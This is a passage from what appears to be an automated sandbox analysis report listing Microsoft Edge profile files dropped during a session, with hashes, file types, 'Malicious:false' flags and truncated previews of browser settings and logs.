                                                                                                                                                                                                                                                                                                      SHA-256:91902D0330DFE367C37275B964285ABC7C11CE92BFABDC3F40E7C3415D491767
                                                                                                                                                                                                                                                                                                      SHA-512:9BEDC1EA63F2F1B1FEC387D0CC7436EEB4FE7EB59278F6E0DA2EFFD020578C2921DE2F418EE91A8D2E12F465A74DDE349F0E27E7D29AD32BBB6BDA345D316F48
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326092147419","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326091766617","domain_dive

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2983e.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9080
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.093944443384687
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st+SGSs+PGyaNPmk8Z3388bV+FiA9WT1P5YJ:st+AseGtJKFbGiOv
                                                                                                                                                                                                                                                                                                      MD5:06751022EF83EEC93154A4A8276D5ADE
                                                                                                                                                                                                                                                                                                      SHA1:D5ACF9666E9A7B418F685FD393F5AE393E022352
                                                                                                                                                                                                                                                                                                      SHA-256:91902D0330DFE367C37275B964285ABC7C11CE92BFABDC3F40E7C3415D491767
                                                                                                                                                                                                                                                                                                      SHA-512:9BEDC1EA63F2F1B1FEC387D0CC7436EEB4FE7EB59278F6E0DA2EFFD020578C2921DE2F418EE91A8D2E12F465A74DDE349F0E27E7D29AD32BBB6BDA345D316F48
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326092147419","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326091766617","domain_dive

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2df79.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9080
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.093944443384687
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st+SGSs+PGyaNPmk8Z3388bV+FiA9WT1P5YJ:st+AseGtJKFbGiOv
                                                                                                                                                                                                                                                                                                      MD5:06751022EF83EEC93154A4A8276D5ADE
                                                                                                                                                                                                                                                                                                      SHA1:D5ACF9666E9A7B418F685FD393F5AE393E022352
                                                                                                                                                                                                                                                                                                      SHA-256:91902D0330DFE367C37275B964285ABC7C11CE92BFABDC3F40E7C3415D491767
                                                                                                                                                                                                                                                                                                      SHA-512:9BEDC1EA63F2F1B1FEC387D0CC7436EEB4FE7EB59278F6E0DA2EFFD020578C2921DE2F418EE91A8D2E12F465A74DDE349F0E27E7D29AD32BBB6BDA345D316F48
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326092147419","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326091766617","domain_dive

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF35499.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9080
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.093944443384687
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st+SGSs+PGyaNPmk8Z3388bV+FiA9WT1P5YJ:st+AseGtJKFbGiOv
                                                                                                                                                                                                                                                                                                      MD5:06751022EF83EEC93154A4A8276D5ADE
                                                                                                                                                                                                                                                                                                      SHA1:D5ACF9666E9A7B418F685FD393F5AE393E022352
                                                                                                                                                                                                                                                                                                      SHA-256:91902D0330DFE367C37275B964285ABC7C11CE92BFABDC3F40E7C3415D491767
                                                                                                                                                                                                                                                                                                      SHA-512:9BEDC1EA63F2F1B1FEC387D0CC7436EEB4FE7EB59278F6E0DA2EFFD020578C2921DE2F418EE91A8D2E12F465A74DDE349F0E27E7D29AD32BBB6BDA345D316F48
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326092147419","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326091766617","domain_dive

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.568002904992919
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:hljEO0WP1hfmB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVK/muG6trwyp1Xtus:hljEO0WP1hfmBu1ja/DfW8Xtv
                                                                                                                                                                                                                                                                                                      MD5:6DAB24C7E4A147D4FBCC126D5A8F38EC
                                                                                                                                                                                                                                                                                                      SHA1:BF2AD2B6FCBF15325FD64149E5EC83B9BDAB2DD0
                                                                                                                                                                                                                                                                                                      SHA-256:F7094985130E1F782F64FDAA3ED5C204F8597E75444CD22322AC5FA5A1A97BB6
                                                                                                                                                                                                                                                                                                      SHA-512:DA641EAC48E26BCA92103095899B4CCDD5690B683CE8CFA06B5B7B39A872EDE8F2B88A99EB75A5D182743EAF5ADD226049AA502D61D3467F970A4FFF35419010
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326091490196","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326091490196","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF292ff.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.568002904992919
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:hljEO0WP1hfmB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVK/muG6trwyp1Xtus:hljEO0WP1hfmBu1ja/DfW8Xtv
                                                                                                                                                                                                                                                                                                      MD5:6DAB24C7E4A147D4FBCC126D5A8F38EC
                                                                                                                                                                                                                                                                                                      SHA1:BF2AD2B6FCBF15325FD64149E5EC83B9BDAB2DD0
                                                                                                                                                                                                                                                                                                      SHA-256:F7094985130E1F782F64FDAA3ED5C204F8597E75444CD22322AC5FA5A1A97BB6
                                                                                                                                                                                                                                                                                                      SHA-512:DA641EAC48E26BCA92103095899B4CCDD5690B683CE8CFA06B5B7B39A872EDE8F2B88A99EB75A5D182743EAF5ADD226049AA502D61D3467F970A4FFF35419010
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326091490196","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326091490196","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF2e0d1.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.568002904992919
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:hljEO0WP1hfmB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVK/muG6trwyp1Xtus:hljEO0WP1hfmBu1ja/DfW8Xtv
                                                                                                                                                                                                                                                                                                      MD5:6DAB24C7E4A147D4FBCC126D5A8F38EC
                                                                                                                                                                                                                                                                                                      SHA1:BF2AD2B6FCBF15325FD64149E5EC83B9BDAB2DD0
                                                                                                                                                                                                                                                                                                      SHA-256:F7094985130E1F782F64FDAA3ED5C204F8597E75444CD22322AC5FA5A1A97BB6
                                                                                                                                                                                                                                                                                                      SHA-512:DA641EAC48E26BCA92103095899B4CCDD5690B683CE8CFA06B5B7B39A872EDE8F2B88A99EB75A5D182743EAF5ADD226049AA502D61D3467F970A4FFF35419010
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326091490196","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326091490196","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):213
                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                                                                                                                      MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                                                                                                                      SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
                                                                                                                                                                                                                                                                                                      SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                                                                                                                      SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):327
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1300510585171875
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7kot+q2PcNwi23oH+TcwtrQMxIFUt8OkKwFZZmw+OkKXVkwOcNwi23oH+TcwtrQq:7povLZYebCFUt8OEX/+OB54ZYebtJ
                                                                                                                                                                                                                                                                                                      MD5:3DC1ACDD3366A1FE7CF47151246D5E55
                                                                                                                                                                                                                                                                                                      SHA1:FE32436FF2D1387C135A8ED04649D235F5DE3567
                                                                                                                                                                                                                                                                                                      SHA-256:29BC66EA6C2D27B2EE7C335464B00B2E3058A02873C24DDFD04825C46524D271
                                                                                                                                                                                                                                                                                                      SHA-512:84421CA3E058BD2522C7D27C9212E4907A42E3B40F1FCC3B88F0B1C24C406547DBE3FFBDBAB7A211AF6C5EEB363402EF5CB8F924431DDC0880CF278CE1FCD859
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:40.444 7f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-14:07:40.450 7f8 Recovering log #3.2024/12/10-14:07:40.453 7f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):327
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1300510585171875
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:7kot+q2PcNwi23oH+TcwtrQMxIFUt8OkKwFZZmw+OkKXVkwOcNwi23oH+TcwtrQq:7povLZYebCFUt8OEX/+OB54ZYebtJ
                                                                                                                                                                                                                                                                                                      MD5:3DC1ACDD3366A1FE7CF47151246D5E55
                                                                                                                                                                                                                                                                                                      SHA1:FE32436FF2D1387C135A8ED04649D235F5DE3567
                                                                                                                                                                                                                                                                                                      SHA-256:29BC66EA6C2D27B2EE7C335464B00B2E3058A02873C24DDFD04825C46524D271
                                                                                                                                                                                                                                                                                                      SHA-512:84421CA3E058BD2522C7D27C9212E4907A42E3B40F1FCC3B88F0B1C24C406547DBE3FFBDBAB7A211AF6C5EEB363402EF5CB8F924431DDC0880CF278CE1FCD859
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-14:07:40.444 7f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-14:07:40.450 7f8 Recovering log #3.2024/12/10-14:07:40.453 7f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13378326093995895

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2222
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.45162587170618
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:3VpP0MmDSWGYfEtU31aDcc+vn+S1J4Ucxv+vn+S12n6FiSztybQ1/lYEjgU31P:33HW/aQHvn+S1Rvn+S1Q6gSUbqmQPP
                                                                                                                                                                                                                                                                                                      MD5:375AD9F632403E8A2BF1C22170F8DBDB
                                                                                                                                                                                                                                                                                                      SHA1:37E90F0409FCCC56A46C99DF6D1968BB55FB5567
                                                                                                                                                                                                                                                                                                      SHA-256:8FDEDB4C4FD8CE8ED8CF0CBEC5A6C521777FF8BEAC5149CA8D41F5E61752667E
                                                                                                                                                                                                                                                                                                      SHA-512:B1D684C3A9F6050EDD10A4044601A23D0DCBAF690E82001A445173C991497C98A88F61E2A24B3067119CE97191E38018DD9AB781CF2286630795A2040171B111
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SNSS........C."............C."......".C."............C."........C."........C."........C."....!...C."................................C.".C."1..,....C."$...993a1a69_d84c_458b_a3ad_4164c19cd417....C."........C."................C."....C."....................5..0....C."&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}......C."...........C."........C."....!...C."................................C.".C."1..,....C."$...8b8c42e8_626e_4161_a470_84012574feaa....C."........C."....3T..........C."............C."....;...file:///C:/Users/user~1/AppData/Local/Temp/1902382389.pdf.............!........................................................................................................b.2.(...b.2.(..H.......`.......................................................................~...;...f.i.l.e.:./././.C.:./.U.s.e.r.s./.F.R.O.N.T.D.~.1./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.1.9.0.2.3.8.2.3.8.9...p.d.f...................................8.......0.......8.................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):358
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.096968327783594
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:78XIq2PcNwi23oH+Tcwt7Uh2ghZIFUt8OjZZmw+OjzkwOcNwi23oH+Tcwt7Uh2gd:784vLZYebIhHh2FUt8O9/+OP54ZYebIT
                                                                                                                                                                                                                                                                                                      MD5:F8AD08B078DB4999BE1EFDD35BAB55A2
                                                                                                                                                                                                                                                                                                      SHA1:AA2AAE9AE11465D3B9541B4F052C750C1A3C9B23
                                                                                                                                                                                                                                                                                                      SHA-256:04C9DDEAF911CE8479E86BF1B6A86E0C336F0EABCDA5C76F7CCD79501B9DFC4D
                                                                                                                                                                                                                                                                                                      SHA-512:94A2F85C2EA09E9A833E13537638FAF6EF66599A982BE6D58C2BD802AE7CC16EF6AC0851E2B54F611B4B392C9C7440D2F0B2326591D590CC6D85C8D0A2AC3E8A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.491 13f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:41:31.511 13f4 Recovering log #3.2024/12/10-12:41:31.511 13f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):358
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.096968327783594
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:78XIq2PcNwi23oH+Tcwt7Uh2ghZIFUt8OjZZmw+OjzkwOcNwi23oH+Tcwt7Uh2gd:784vLZYebIhHh2FUt8O9/+OP54ZYebIT
                                                                                                                                                                                                                                                                                                      MD5:F8AD08B078DB4999BE1EFDD35BAB55A2
                                                                                                                                                                                                                                                                                                      SHA1:AA2AAE9AE11465D3B9541B4F052C750C1A3C9B23
                                                                                                                                                                                                                                                                                                      SHA-256:04C9DDEAF911CE8479E86BF1B6A86E0C336F0EABCDA5C76F7CCD79501B9DFC4D
                                                                                                                                                                                                                                                                                                      SHA-512:94A2F85C2EA09E9A833E13537638FAF6EF66599A982BE6D58C2BD802AE7CC16EF6AC0851E2B54F611B4B392C9C7440D2F0B2326591D590CC6D85C8D0A2AC3E8A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/10-12:41:31.491 13f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:41:31.511 13f4 Recovering log #3.2024/12/10-12:41:31.511 13f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0017369714753854256
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zEZlLK/lll:/M/xT02z3lll
                                                                                                                                                                                                                                                                                                      MD5:726C590EFD319DF35FF04E713CC25F12
                                                                                                                                                                                                                                                                                                      SHA1:2A88E4415A0E23F283CEB14C0FD478DD6EF35F35
                                                                                                                                                                                                                                                                                                      SHA-256:6D9FD22194B725FCE29BD373E7ABD3B0529EF9C6CEDCFFEEA01E7F7F7AB6D72E
                                                                                                                                                                                                                                                                                                      SHA-512:B66E84A18EA776F7C0BBFBDBFD5D339197B394DD6E6D0E78F8C4943E56FA681C5E30DA9123A74728027004E32F0C70C7F46F9C09A3DC2D372226AE9819A1F019
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):270336
